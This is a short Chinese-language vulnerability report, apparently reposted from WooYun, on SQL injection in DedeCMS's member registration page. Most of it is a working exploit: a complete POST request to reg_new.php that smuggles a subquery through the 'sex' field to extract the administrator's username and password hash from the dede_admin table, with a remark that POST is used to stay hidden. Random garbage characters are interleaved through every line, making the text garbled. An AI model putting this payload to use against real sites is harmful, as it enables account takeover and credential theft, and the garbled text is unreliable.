漏洞类型: SQL注射漏洞
" S8 U2 `, _- i* ^; Q2 q' ^简要描述:
- N. y: e) j, t$ L5 {( Z$ u) K% m / e+ f& S5 e1 z$ G0 r, K" J
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 b% S. E# g1 Y" { {, e
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
. G; J5 n+ `0 U" e' U详细说明:跟这个漏洞: J& P4 }; f d" C7 Y& |1 O
( Z) i0 N+ h6 a, {
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
6 @8 W/ |, t. }! y" J3 R是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.6 ^: M. W' V+ L- p, ~: `% C3 t# R
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
5 m3 T' u3 q i9 B+ r* A( \; }
. S; K X) }; ~3 L K, Jwww.political-security.com/member/reg_new.php
' m1 [# e& Q9 t3 h( G7 @$ o * i- K5 j; s \" C
POST
3 h% ^# t6 H% t" `8 t8 O+ {
+ D% P, c# t! G, ~- Q _0 udopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ D2 q. `- l& _. T6 k, z% j0 @userid=c4rp3nt3r&uname=c4rp3nt3r& U9 `/ H* F. [2 B
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
" R1 O- h7 ^9 R- i&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# |* L9 T2 \$ ~- W& t' f(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');# N" s& W! s# S! i! X
%00&vdcode=glos&agree= |